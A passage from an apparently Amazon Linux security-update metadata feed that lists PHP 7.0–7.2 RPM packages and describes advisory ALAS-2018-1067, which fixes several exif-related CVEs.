version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.20-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1067</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1067: medium priority package update for php72</title><issued date="2018-08-22 19:31:00" /><updated date="2018-08-23 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14883:
An issue was discovered in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8. An Integer Overflow leads to a heap-based buffer over-read in exif_thumbnail_extract of exif.c.
1609637:
CVE-2018-14883 php: exif: integer overflow leading to out-of-bound buffer read in exif_thumbnail_extract()
CVE-2018-14851:
exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.
1609642:
CVE-2018-14851 php: exif: buffer over-read in exif_process_IFD_in_MAKERNOTE()
CVE-2018-12882:
exif_read_from_impl in ext/exif/exif.c in PHP 7.2.x through 7.2.7 allows attackers to trigger a use-after-free (in exif_read_from_file) because it closes a stream that it is not responsible for closing. The vulnerable code is reachable through the PHP exif_read_data function.
1595502:
CVE-2018-12882 php: Use-after-free reachable via the exif.c:exif_read_from_impl() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12882" title="" id="CVE-2018-12882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14851" title="" id="CVE-2018-14851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14883" title="" id="CVE-2018-14883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-pspell" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.8" release="1.5.amzn1" epoch="0" 